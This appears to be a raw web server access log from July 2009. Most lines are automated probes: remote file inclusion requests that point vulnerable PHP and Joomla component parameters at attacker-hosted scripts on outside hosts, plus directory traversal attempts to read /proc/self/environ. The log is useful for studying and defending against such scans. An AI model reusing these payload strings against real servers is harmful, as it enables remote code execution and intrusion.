210.205.57.2 - - [13/Jul/2009:03:28:30 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:28:30 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:30:04 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:30:04 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:30:04 -0400] "GET /logs/access_log.Q109062700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:30:21 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.163.139.56 - - [13/Jul/2009:03:31:13 -0400] "GET /logs/access_log.Q109060100/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
202.174.82.220 - - [13/Jul/2009:03:31:21 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
202.174.82.220 - - [13/Jul/2009:03:31:21 -0400] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
210.205.57.2 - - [13/Jul/2009:03:31:23 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
202.174.82.220 - - [13/Jul/2009:03:31:28 -0400] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
124.0.139.129 - - [13/Jul/2009:03:31:31 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:31:31 -0400] "GET //galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:31:31 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:31:31 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:03:31:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.22.140.17 - - [13/Jul/2009:03:32:20 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:03:32:20 -0400] "GET /logs/access_log.Q109062100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:03:32:20 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:32:28 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:32:28 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
202.174.82.220 - - [13/Jul/2009:03:33:06 -0400] "GET /logs/error_log.Q109051500/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
59.22.140.17 - - [13/Jul/2009:03:33:06 -0400] "GET /logs/access_log.Q109062100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:03:33:30 -0400] "GET /index.php?stranica=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:03:33:30 -0400] "GET /logs/index.php?stranica=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:03:33:35 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?stranica=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:34:00 -0400] "GET //galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:34:00 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:34:00 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:34:00 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:03:34:01 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:34:20 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:34:30 -0400] "GET /logs/access_log.Q109070300%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
83.170.112.243 - - [13/Jul/2009:03:34:34 -0400] "GET ///vwar/backup/errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
200.105.207.244 - - [13/Jul/2009:03:34:56 -0400] "GET /logs/access_log.Q109062700%20%20/index.php?stranica=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:03:34:59 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:03:35:07 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:03:35:26 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
67.192.120.182 - - [13/Jul/2009:03:35:26 -0400] "GET //skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
67.192.120.182 - - [13/Jul/2009:03:35:26 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
67.192.120.182 - - [13/Jul/2009:03:35:27 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
79.174.68.88 - - [13/Jul/2009:03:35:52 -0400] "GET //administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:35:52 -0400] "GET /logs//administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:35:52 -0400] "GET /logs/access_log.Q109070500//administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:36:27 -0400] "GET /logs/access_log.Q109070500%20%20//administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:03:36:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.174.68.88 - - [13/Jul/2009:03:36:51 -0400] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:03:37:02 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
117.74.99.225 - - [13/Jul/2009:03:37:02 -0400] "GET //skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
117.74.99.225 - - [13/Jul/2009:03:37:02 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
85.214.29.182 - - [13/Jul/2009:03:37:02 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.5euroshirts.com/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.214.29.182 - - [13/Jul/2009:03:37:02 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.5euroshirts.com/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
85.214.29.182 - - [13/Jul/2009:03:37:02 -0400] "GET /logs/access_log.Q109051200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.5euroshirts.com/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:03:37:02 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
211.206.120.187 - - [13/Jul/2009:03:37:39 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.206.120.187 - - [13/Jul/2009:03:37:39 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.206.120.187 - - [13/Jul/2009:03:37:39 -0400] "GET //galeria.php?start=0&kategoria=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
211.206.120.187 - - [13/Jul/2009:03:37:42 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.29.182 - - [13/Jul/2009:03:38:37 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.5euroshirts.com/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:38:46 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:38:46 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:38:46 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:03:38:50 -0400] "GET /logs/access_log.Q109062800%20//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
85.214.29.182 - - [13/Jul/2009:03:39:02 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.5euroshirts.com/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:03:39:09 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:03:39:09 -0400] "GET //skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:03:39:09 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.230.76.138 - - [13/Jul/2009:03:39:11 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
87.230.76.138 - - [13/Jul/2009:03:39:11 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
87.230.76.138 - - [13/Jul/2009:03:39:11 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
67.192.120.182 - - [13/Jul/2009:03:39:13 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.230.76.138 - - [13/Jul/2009:03:39:14 -0400] "GET /logs/access_log.Q109062200//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
87.230.76.138 - - [13/Jul/2009:03:39:14 -0400] "GET //com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
87.230.76.138 - - [13/Jul/2009:03:39:15 -0400] "GET /logs//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
87.230.76.138 - - [13/Jul/2009:03:39:47 -0400] "GET /logs/access_log.Q109070800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
68.109.233.157 - - [13/Jul/2009:03:39:59 -0400] "GET /logs/access_log.Q109070200////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
68.109.233.157 - - [13/Jul/2009:03:39:59 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.230.76.138 - - [13/Jul/2009:03:40:22 -0400] "GET /logs/access_log.Q109063000//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
65.254.32.2 - - [13/Jul/2009:03:40:35 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.236.44.96 - - [13/Jul/2009:03:40:37 -0400] "GET /index.php?arquivo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 207 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:03:40:37 -0400] "GET /logs/index.php?arquivo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 212 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:03:40:37 -0400] "GET /logs/access_log.Q109062200/index.php?arquivo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:03:40:38 -0400] "GET /index.php?arquivo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:03:40:38 -0400] "GET /logs/index.php?arquivo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:03:40:38 -0400] "GET /logs/access_log.Q109062200/index.php?arquivo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:03:40:38 -0400] "GET /logs/access_log.Q109051400/index.php?arquivo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
222.236.44.96 - - [13/Jul/2009:03:40:38 -0400] "GET /logs/access_log.Q109051400/index.php?arquivo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
79.174.68.88 - - [13/Jul/2009:03:40:49 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:40:49 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:40:49 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
87.230.76.138 - - [13/Jul/2009:03:40:57 -0400] "GET //com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
65.55.105.236 - - [13/Jul/2009:03:41:04 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.236 - - [13/Jul/2009:03:41:04 -0400] "GET /logs/access_log.Q107082600 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.230.76.138 - - [13/Jul/2009:03:41:31 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
209.59.12.99 - - [13/Jul/2009:03:41:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.206.120.187 - - [13/Jul/2009:03:41:53 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:41:59 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_performs/performs.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
81.13.86.34 - - [13/Jul/2009:03:42:24 -0400] "GET /logs/access_log.Q109060800/export.php?mosConfig_absolute_path=http://www.tv-rb.ru/downloads/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
81.13.86.34 - - [13/Jul/2009:03:42:24 -0400] "GET /logs/export.php?mosConfig_absolute_path=http://www.tv-rb.ru/downloads/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
81.13.86.34 - - [13/Jul/2009:03:42:24 -0400] "GET /export.php?mosConfig_absolute_path=http://www.tv-rb.ru/downloads/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
211.206.120.187 - - [13/Jul/2009:03:42:33 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:42:41 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:42:41 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:42:41 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:03:42:45 -0400] "GET /logs/access_log.Q109062800%20//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
81.13.86.34 - - [13/Jul/2009:03:42:50 -0400] "GET /logs/access_log.Q109052400/export.php?mosConfig_absolute_path=http://www.tv-rb.ru/downloads/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
124.0.145.1 - - [13/Jul/2009:03:42:53 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:43:04 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:43:04 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:43:04 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:43:04 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:43:05 -0400] "GET /logs/error_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:03:43:09 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.192.120.182 - - [13/Jul/2009:03:43:09 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:03:43:14 -0400] "GET //skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:03:43:14 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:03:43:14 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:03:43:14 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:43:23 -0400] "GET /logs/error_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
207.182.133.50 - - [13/Jul/2009:03:43:32 -0400] "GET /logs//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
207.182.133.50 - - [13/Jul/2009:03:43:32 -0400] "GET /logs/access_log.Q109062200%20%20//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
